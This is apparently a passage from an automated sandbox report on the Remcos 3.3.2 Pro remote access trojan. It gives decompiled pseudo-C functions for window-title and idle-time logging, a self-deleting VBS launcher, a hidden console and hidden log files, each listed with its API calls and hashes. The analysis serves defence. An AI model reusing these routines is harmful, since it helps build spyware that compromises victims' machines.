                                                                                                															_t81 = _t77 & _t121 + 0x00000008;
                                                                                                															_t108 = _t121 + 8;
                                                                                                															if((_t77 & _t121 + 0x00000008) > 0x400) {
                                                                                                																asm("sbb eax, eax");
                                                                                                																_t130 = E00440C6C(_t108, _t81 & _t108);
                                                                                                																_pop(_t108);
                                                                                                																if(_t130 == 0) {
                                                                                                																	goto L59;
                                                                                                																} else {
                                                                                                																	 *_t130 = 0xdddd;
                                                                                                																	goto L54;
                                                                                                																}
                                                                                                															} else {
                                                                                                																asm("sbb eax, eax");
                                                                                                																E004519B0();
                                                                                                																_t130 = _t133;
                                                                                                																if(_t130 == 0) {
                                                                                                																	L59:
                                                                                                																	_t100 = _v32;
                                                                                                																} else {
                                                                                                																	 *_t130 = 0xcccc;
                                                                                                																	L54:
                                                                                                																	_t130 =  &(_t130[4]);
                                                                                                																	L56:
                                                                                                																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
                                                                                                																		goto L59;
                                                                                                																	} else {
                                                                                                																		_t100 = _v32;
                                                                                                																		_t126 = E00443382(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                														E004318FD(_t130);
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								E004318FD(_t100);
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				L63:
                                                                                                				return E00430A5B(_v8 ^ _t132);
                                                                                                			}







































                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044E7E9,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044E5BC
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044E7E9,00000000,00000000,?,00000001,?,?,?,?), ref: 0044E63F
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044E677
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,D,?,0044E7E9,00000000,00000000,?,00000001,?,?,?,?), ref: 0044E6D2
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044E721
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0044E7E9,00000000,00000000,?,00000001,?,?,?,?), ref: 0044E6E9
                                                                                                  • Part of subcall function 00440C6C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0044E7E9,00000000,00000000,?,00000001,?,?,?,?), ref: 0044E765
                                                                                                • __freea.LIBCMT ref: 0044E790
                                                                                                • __freea.LIBCMT ref: 0044E79C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                • String ID: D
                                                                                                • API String ID: 201697637-193714618
                                                                                                • Opcode ID: 8a28940df9b7658ffb5a64ce00da38eb783564ab905039fe25f974b679583ca0
                                                                                                • Instruction ID: 91fd6c9c5b5ea74ab1161302763bb0474b3c65c8354b7168618d08022f45a557
                                                                                                • Opcode Fuzzy Hash: 8a28940df9b7658ffb5a64ce00da38eb783564ab905039fe25f974b679583ca0
                                                                                                • Instruction Fuzzy Hash: 3B91D671E00215AEFF208EA6C881EEF7BB5BF09314F14455AE904E7281E73DDC418B69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 89%
                                                                                                			E004091BA(void* __ecx, void* __edx) {
                                                                                                				char _v28;
                                                                                                				char _v56;
                                                                                                				char _v76;
                                                                                                				char _v80;
                                                                                                				char _v100;
                                                                                                				void* _v104;
                                                                                                				char _v108;
                                                                                                				char _v112;
                                                                                                				struct HWND__* _v116;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				int _t36;
                                                                                                				struct HWND__* _t42;
                                                                                                				void* _t50;
                                                                                                				int _t57;
                                                                                                				struct HWND__* _t77;
                                                                                                				void* _t119;
                                                                                                				signed int _t125;
                                                                                                				void* _t127;
                                                                                                
                                                                                                				_t112 = __edx;
                                                                                                				_t127 = (_t125 & 0xfffffff8) - 0x74;
                                                                                                				_push(_t77);
                                                                                                				_push(0xea60);
                                                                                                				_t119 = __ecx;
                                                                                                				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                                                                                                					Sleep(0x1f4);
                                                                                                					_t77 = GetForegroundWindow();
                                                                                                					_t36 = GetWindowTextLengthW(_t77);
                                                                                                					_t4 = _t36 + 1; // 0x1
                                                                                                					E00409E21(_t77,  &_v100, _t112, _t119, _t4, 0);
                                                                                                					if(_t36 != 0) {
                                                                                                						_t57 = E0040247B();
                                                                                                						GetWindowTextW(_t77, E00401EDD( &_v100), _t57);
                                                                                                						_t112 = 0x46fe9c;
                                                                                                						if(E00409EE1(0x46fe9c) == 0) {
                                                                                                							E00409E07(0x46fe9c,  &_v100);
                                                                                                							E004074A2(E0040247B() - 1);
                                                                                                							_t127 = _t127 - 0x18;
                                                                                                							_t136 =  *0x46e3fb;
                                                                                                							if( *0x46e3fb == 0) {
                                                                                                								_t112 = E00409E9E( &_v76, L"\r\n[", __eflags,  &_v108);
                                                                                                								E00403098(_t77, _t127, _t67, _t119, __eflags, L"]\r\n");
                                                                                                								E00408BB6(_t119);
                                                                                                								E00401EE2();
                                                                                                							} else {
                                                                                                								E004074B3(_t77, _t127, 0x46fe9c, _t136,  &_v108);
                                                                                                								E0040964B(_t77, _t119, _t136);
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					_t83 = _t119;
                                                                                                					E00409C4A(_t119);
                                                                                                					if(E00417BC6(_t119) < 0xea60) {
                                                                                                						L18:
                                                                                                						E00401EE2();
                                                                                                						continue;
                                                                                                					} else {
                                                                                                						_t77 = _v116;
                                                                                                						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                                                                                                							_t42 = E00417BC6(_t83);
                                                                                                							if(_t42 < 0xea60) {
                                                                                                								__eflags = _t77 % 0xea60;
                                                                                                								E0043CDA6(_t83, _t77 / 0xea60,  &_v112, 0xa);
                                                                                                								_t50 = E004076BB(_t77,  &_v80, E004053F2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402076(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
                                                                                                								_t127 = _t127 + 0xc - 0x14;
                                                                                                								_t112 = _t50;
                                                                                                								E00417CCA(_t127, _t50);
                                                                                                								E00408BB6(_t119);
                                                                                                								E00401FB9();
                                                                                                								E00401FB9();
                                                                                                								E00401FB9();
                                                                                                								goto L18;
                                                                                                							}
                                                                                                							_t77 = _t42;
                                                                                                							_v116 = _t77;
                                                                                                							Sleep(0x3e8);
                                                                                                						}
                                                                                                						E00401EE2();
                                                                                                						break;
                                                                                                					}
                                                                                                				}
                                                                                                				__eflags = 0;
                                                                                                				return 0;
                                                                                                			}























                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040921C
                                                                                                • Sleep.KERNEL32(000001F4), ref: 00409227
                                                                                                • GetForegroundWindow.USER32 ref: 0040922D
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00409236
                                                                                                • GetWindowTextW.USER32 ref: 0040926A
                                                                                                • Sleep.KERNEL32(000003E8), ref: 00409338
                                                                                                  • Part of subcall function 00409E9E: char_traits.LIBCPMT ref: 00409EAE
                                                                                                  • Part of subcall function 00408BB6: SetEvent.KERNEL32(?,?,?,?,00409D31,?,?,?,?,?,00000000), ref: 00408BE3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                                                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                                                • API String ID: 107669343-3954389425
                                                                                                • Opcode ID: 5d45b11ecc8e9c23778f9f7fef8c73985cf12f3dee1bdaf9cf281a776685ddf6
                                                                                                • Instruction ID: cca114199e163c592f4f49c004b9388a44b1f7875ebe9eee3f2e86a475b88c5a
                                                                                                • Opcode Fuzzy Hash: 5d45b11ecc8e9c23778f9f7fef8c73985cf12f3dee1bdaf9cf281a776685ddf6
                                                                                                • Instruction Fuzzy Hash: AB51E5716083015BC314FB65D895A6F77A5AB84308F40093FF486A62E3EF7C9E44C69E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0040B4AC(void* __ebx, void* __eflags) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v100;
                                                                                                				char _v124;
                                                                                                				char _v148;
                                                                                                				char _v172;
                                                                                                				char _v196;
                                                                                                				short _v716;
                                                                                                				void* __edi;
                                                                                                				void* __ebp;
                                                                                                				void* _t36;
                                                                                                				void* _t37;
                                                                                                				void* _t40;
                                                                                                				void* _t54;
                                                                                                				void* _t67;
                                                                                                				void* _t68;
                                                                                                				void* _t79;
                                                                                                
                                                                                                				_t79 = __ebx;
                                                                                                				E00410199();
                                                                                                				_t36 = E0040247B();
                                                                                                				_t37 = E00401F87(0x46e5f0);
                                                                                                				_t40 = E00410A5F(E00401F87(0x46e5a8), "exepath",  &_v716, 0x208, _t37, _t36);
                                                                                                				_t140 = _t40;
                                                                                                				if(_t40 == 0) {
                                                                                                					GetModuleFileNameW(0,  &_v716, 0x208);
                                                                                                				}
                                                                                                				E00403098(_t79,  &_v124, E00417CCA( &_v52, E00417A83( &_v76)), 0, _t140, L".vbs");
                                                                                                				E00401EE2();
                                                                                                				E00401FB9();
                                                                                                				E0040440A(_t79,  &_v100, E00403098(_t79,  &_v76, E00404260(_t79,  &_v52, E00437AEF(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401F5F(_t79,  &_v28);
                                                                                                				_t54 = E00404260(_t79,  &_v196, L"\"\"\", 0");
                                                                                                				E00403303(E00403098(_t79,  &_v76, E00403022( &_v52, E00403098(_t79,  &_v148, E00404260(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E0040778C(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
                                                                                                				_t67 = E00401EDD( &_v100);
                                                                                                				_t68 = E0040247B();
                                                                                                				if(E00418337(E00401EDD( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401EDD( &_v100), 0x46079c, 0x46079c, 0) > 0x20) {
                                                                                                					ExitProcess(0);
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				return E00401EE2();
                                                                                                			}






















                                                                                                APIs
                                                                                                  • Part of subcall function 00410199: TerminateProcess.KERNEL32(00000000,?,0040ADB9), ref: 004101A9
                                                                                                  • Part of subcall function 00410199: WaitForSingleObject.KERNEL32(000000FF,?,0040ADB9), ref: 004101BC
                                                                                                  • Part of subcall function 00410A5F: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00410A7B
                                                                                                  • Part of subcall function 00410A5F: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410A94
                                                                                                  • Part of subcall function 00410A5F: RegCloseKey.ADVAPI32(00000000), ref: 00410A9F
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B506
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,0046079C,0046079C,00000000), ref: 0040B665
                                                                                                • ExitProcess.KERNEL32 ref: 0040B671
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                • API String ID: 1913171305-2411266221
                                                                                                • Opcode ID: 16eb3a1aee9e744480a25e704904c60fb2ee977b531af39979622423ab843efb
                                                                                                • Instruction ID: 50d1eacbe9d4bae87c6deddb7dde53d9086f1fae01dd1ae82fe3b0704b6d40e9
                                                                                                • Opcode Fuzzy Hash: 16eb3a1aee9e744480a25e704904c60fb2ee977b531af39979622423ab843efb
                                                                                                • Instruction Fuzzy Hash: DB414E719011185ACB04FBA2DC96DEE7778AF50708F10017FF506B21E2EE385E8ACA9D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 59%
                                                                                                			E004199B8(void* __ebx, void* __ecx, void* __edx) {
                                                                                                				char _v204;
                                                                                                				void* __edi;
                                                                                                				struct HWND__* _t17;
                                                                                                				void _t22;
                                                                                                				intOrPtr _t24;
                                                                                                				intOrPtr _t25;
                                                                                                				void _t26;
                                                                                                				void _t28;
                                                                                                				void* _t30;
                                                                                                				void* _t34;
                                                                                                				signed int _t37;
                                                                                                				void* _t45;
                                                                                                				void* _t47;
                                                                                                				void* _t51;
                                                                                                				void* _t53;
                                                                                                				void* _t55;
                                                                                                				void* _t59;
                                                                                                
                                                                                                				_t36 = __ecx;
                                                                                                				_t34 = __ecx;
                                                                                                				AllocConsole();
                                                                                                				_t17 =  *0x46ebe0(__ebx);
                                                                                                				 *0x46e0ac = _t17;
                                                                                                				if(_t34 == 0) {
                                                                                                					ShowWindow(_t17, 0);
                                                                                                				}
                                                                                                				_push(_t45);
                                                                                                				E0043CF7D(_t36, "CONOUT$", "a", E0043855F(1));
                                                                                                				E00432D80(_t45,  &_v204, 0, 0xc8);
                                                                                                				_t47 =  &_v204 - 1;
                                                                                                				do {
                                                                                                					_t22 =  *(_t47 + 1);
                                                                                                					_t47 = _t47 + 1;
                                                                                                				} while (_t22 != 0);
                                                                                                				_t37 = 7;
                                                                                                				memcpy(_t47, "--------------------------\n", _t37 << 2);
                                                                                                				_t51 =  &_v204 - 1;
                                                                                                				do {
                                                                                                					_t24 =  *((intOrPtr*)(_t51 + 1));
                                                                                                					_t51 = _t51 + 1;
                                                                                                				} while (_t24 != 0);
                                                                                                				asm("movsd");
                                                                                                				asm("movsd");
                                                                                                				asm("movsd");
                                                                                                				_t53 =  &_v204 - 1;
                                                                                                				do {
                                                                                                					_t25 =  *((intOrPtr*)(_t53 + 1));
                                                                                                					_t53 = _t53 + 1;
                                                                                                				} while (_t25 != 0);
                                                                                                				asm("movsd");
                                                                                                				asm("movsd");
                                                                                                				asm("movsw");
                                                                                                				_t55 =  &_v204 - 1;
                                                                                                				do {
                                                                                                					_t26 =  *(_t55 + 1);
                                                                                                					_t55 = _t55 + 1;
                                                                                                				} while (_t26 != 0);
                                                                                                				_push(6);
                                                                                                				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
                                                                                                				asm("movsw");
                                                                                                				_t59 =  &_v204 - 1;
                                                                                                				do {
                                                                                                					_t28 =  *(_t59 + 1);
                                                                                                					_t59 = _t59 + 1;
                                                                                                					_t85 = _t28;
                                                                                                				} while (_t28 != 0);
                                                                                                				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
                                                                                                				asm("movsb");
                                                                                                				return E00417604(_t85, _t30, 7);
                                                                                                			}





















                                                                                                APIs
                                                                                                • AllocConsole.KERNEL32(00000001), ref: 004199C4
                                                                                                • GetConsoleWindow.KERNEL32 ref: 004199CA
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 004199DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ConsoleWindow$AllocShow
                                                                                                • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.3.2 Pro$CONOUT$$hpg
                                                                                                • API String ID: 3461962499-3378204264
                                                                                                • Opcode ID: f6657928ed06dba2a905d0438f486c26dfb192fb12f351024f99a457849e62c5
                                                                                                • Instruction ID: 376f907b1e217a26e7f1eac8cc5f7dbbc1ba93a394bfc088cef5e685ba49c60e
                                                                                                • Opcode Fuzzy Hash: f6657928ed06dba2a905d0438f486c26dfb192fb12f351024f99a457849e62c5
                                                                                                • Instruction Fuzzy Hash: 5F212B3680864156DF109F15AC01FD6BB6AAF92744F044293E84C7F141DBA76DDA87AC
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E004362EA(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                				int _v8;
                                                                                                				int _v12;
                                                                                                				char _v16;
                                                                                                				intOrPtr _v24;
                                                                                                				char _v28;
                                                                                                				void* __ebx;
                                                                                                				char* _t31;
                                                                                                				int _t35;
                                                                                                				int _t43;
                                                                                                				void* _t51;
                                                                                                				int _t52;
                                                                                                				int _t54;
                                                                                                				void* _t56;
                                                                                                				void* _t63;
                                                                                                				short* _t64;
                                                                                                				short* _t67;
                                                                                                
                                                                                                				_t62 = __edx;
                                                                                                				E00436267(_t51,  &_v28, __edx, _a24);
                                                                                                				_t52 = 0;
                                                                                                				_t54 =  *(_v24 + 0x14);
                                                                                                				_t31 = _a4;
                                                                                                				_v8 = _t54;
                                                                                                				if(_t31 == 0) {
                                                                                                					L4:
                                                                                                					 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                					E00437709();
                                                                                                					L18:
                                                                                                					if(_v16 != 0) {
                                                                                                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                					}
                                                                                                					return _t52;
                                                                                                				}
                                                                                                				_t66 = _a8;
                                                                                                				if(_a8 == 0) {
                                                                                                					goto L4;
                                                                                                				}
                                                                                                				 *_t31 = 0;
                                                                                                				if(_a12 == 0 || _a16 == 0) {
                                                                                                					goto L4;
                                                                                                				} else {
                                                                                                					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
                                                                                                					_v12 = _t35;
                                                                                                					if(_t35 != 0) {
                                                                                                						_t64 = E00440C6C(_t54, _t35 + _t35);
                                                                                                						_t56 = _t63;
                                                                                                						if(_t64 != 0) {
                                                                                                							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
                                                                                                								_t67 = E00440C6C(_t56, _t66 + _t66);
                                                                                                								if(_t67 != 0) {
                                                                                                									_t43 = E00442733(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
                                                                                                									_v12 = _t43;
                                                                                                									if(_t43 != 0) {
                                                                                                										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
                                                                                                											_t52 = _v12;
                                                                                                										} else {
                                                                                                											E004388FC(GetLastError());
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								E004414D5(_t67);
                                                                                                							} else {
                                                                                                								E004388FC(GetLastError());
                                                                                                							}
                                                                                                						}
                                                                                                						E004414D5(_t64);
                                                                                                					} else {
                                                                                                						E004388FC(GetLastError());
                                                                                                					}
                                                                                                					goto L18;
                                                                                                				}
                                                                                                			}




















                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D2B,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00436342
                                                                                                • GetLastError.KERNEL32(?,?,00401D2B,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043634F
                                                                                                • __dosmaperr.LIBCMT ref: 00436356
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D2B,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00436382
                                                                                                • GetLastError.KERNEL32(?,?,?,00401D2B,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043638C
                                                                                                • __dosmaperr.LIBCMT ref: 00436393
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D2B,?), ref: 004363D6
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D2B,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004363E0
                                                                                                • __dosmaperr.LIBCMT ref: 004363E7
                                                                                                • _free.LIBCMT ref: 004363F3
                                                                                                • _free.LIBCMT ref: 004363FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2441525078-0
                                                                                                • Opcode ID: 60cc57f5f55a393d52f28039bedbdabb895f99d02aca867e29ce67f9be203048
                                                                                                • Instruction ID: 2c5cfa2bbbf2b121d32445315a33a4036265803538bdfa5b44ed81074408bed6
                                                                                                • Opcode Fuzzy Hash: 60cc57f5f55a393d52f28039bedbdabb895f99d02aca867e29ce67f9be203048
                                                                                                • Instruction Fuzzy Hash: 9531C07280021ABFDF116FA5DC448AF7B78EF08368F11816EF8105A2A1DB38CD51CB69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 98%
                                                                                                			E00408CA7(void* __ecx, char* __edx) {
                                                                                                				char _v1028;
                                                                                                				char _v1040;
                                                                                                				char _v1064;
                                                                                                				char _v1076;
                                                                                                				void* _v1080;
                                                                                                				void* _v1088;
                                                                                                				void* _v1092;
                                                                                                				char _v1100;
                                                                                                				char _v1124;
                                                                                                				void* _v1132;
                                                                                                				char _v1136;
                                                                                                				void* _v1152;
                                                                                                				void* __ebx;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed char _t34;
                                                                                                				char* _t36;
                                                                                                				void* _t38;
                                                                                                				int _t42;
                                                                                                				void* _t49;
                                                                                                				void* _t53;
                                                                                                				void* _t65;
                                                                                                				int _t66;
                                                                                                				void* _t68;
                                                                                                				void* _t74;
                                                                                                				void* _t75;
                                                                                                				void* _t76;
                                                                                                				void* _t83;
                                                                                                				signed int _t141;
                                                                                                				signed int _t142;
                                                                                                				void* _t143;
                                                                                                				void* _t144;
                                                                                                				signed int _t145;
                                                                                                
                                                                                                				_t131 = __edx;
                                                                                                				_t142 = _t141 & 0xfffffff8;
                                                                                                				_t145 = _t142;
                                                                                                				_t143 = _t142 - 0x464;
                                                                                                				_t83 = __ecx;
                                                                                                				_t136 = __ecx + 4;
                                                                                                				do {
                                                                                                					Sleep(0x1388);
                                                                                                					E00408BF6(_t83, _t131);
                                                                                                					_t131 = 0x46079c;
                                                                                                					if(E00407647(_t145) != 0) {
                                                                                                						if(E00409DEA() == 0) {
                                                                                                							CreateDirectoryW(E00401EDD(0x46e428), 0);
                                                                                                						}
                                                                                                						_t133 = _t83 + 0x60;
                                                                                                						_t34 = GetFileAttributesW(E00401EDD(_t83 + 0x60));
                                                                                                						_t148 = _t34 & 0x00000002;
                                                                                                						if((_t34 & 0x00000002) != 0) {
                                                                                                							SetFileAttributesW(E00401EDD(_t133), 0x80);
                                                                                                						}
                                                                                                						_t36 = E00401F87(E00401E3B(0x46e3a4, _t131, _t148, 0x12));
                                                                                                						_t149 =  *_t36;
                                                                                                						if( *_t36 != 0) {
                                                                                                							E004020C7(_t83,  &_v1124);
                                                                                                							_t38 = E0040247B();
                                                                                                							E00405C28( &_v1028, E00401F87(0x46e5f0), _t38);
                                                                                                							_t42 = PathFileExistsW(E00401EDD(_t133));
                                                                                                							__eflags = _t42;
                                                                                                							if(_t42 != 0) {
                                                                                                								E004020C7(_t83,  &_v1100);
                                                                                                								_t65 = E00401EDD(_t133);
                                                                                                								_t131 =  &_v1100;
                                                                                                								_t66 = E004183CC(_t65,  &_v1100);
                                                                                                								__eflags = _t66;
                                                                                                								if(_t66 != 0) {
                                                                                                									_t68 = E0040247B();
                                                                                                									E00401FC3( &_v1136,  &_v1100, _t136, E00405D50(_t83,  &_v1028,  &_v1100,  &_v1076, E00401F87( &_v1100), _t68));
                                                                                                									E00401FB9();
                                                                                                								}
                                                                                                								E00401FB9();
                                                                                                							}
                                                                                                							__eflags = E0040247B() + _t43;
                                                                                                							E00403428(E0040209D(_t83,  &_v1076, _t131, __eflags, E00401EDD(_t136), E0040247B() + _t43));
                                                                                                							E00401FB9();
                                                                                                							_t49 = E0040247B();
                                                                                                							E00405D50(_t83,  &_v1040, _t131,  &_v1064, E00401F87( &_v1136), _t49);
                                                                                                							_t53 = E00401EDD(_t133);
                                                                                                							_t144 = _t143 - 0x18;
                                                                                                							E004020DE(_t83, _t144, _t131, __eflags,  &_v1076);
                                                                                                							E0041843E(_t53);
                                                                                                							_t143 = _t144 + 0x18;
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                						} else {
                                                                                                							_t74 = E00401EDD(_t133);
                                                                                                							_t75 = E0040247B();
                                                                                                							_t76 = E00401EDD(_t83 + 4);
                                                                                                							_t131 = _t75 + _t75;
                                                                                                							E00418337(_t76, _t75 + _t75, _t74, 1);
                                                                                                						}
                                                                                                						_t136 = _t83 + 4;
                                                                                                						E00409DFE(_t83, _t83 + 4, 0x46079c);
                                                                                                						if( *((char*)(E00401F87(E00401E3B(0x46e3a4, _t131, _t149, 0x13)))) != 0) {
                                                                                                							SetFileAttributesW(E00401EDD(_t133), 6);
                                                                                                						}
                                                                                                					}
                                                                                                				} while ( *((char*)(_t83 + 0x49)) != 0);
                                                                                                				return 0;
                                                                                                			}





































                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00001388), ref: 00408CC0
                                                                                                  • Part of subcall function 00408BF6: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408CCD), ref: 00408C2C
                                                                                                  • Part of subcall function 00408BF6: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408CCD), ref: 00408C3B
                                                                                                  • Part of subcall function 00408BF6: Sleep.KERNEL32(00002710,?,?,?,00408CCD), ref: 00408C68
                                                                                                  • Part of subcall function 00408BF6: CloseHandle.KERNEL32(00000000,?,?,?,00408CCD), ref: 00408C6F
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00408CFC
                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00408D0D
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00408D24
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000012), ref: 00408D9F
                                                                                                  • Part of subcall function 004183CC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,0046079C), ref: 00408EBB
                                                                                                Strings
                                                                                                Memory Dump Source
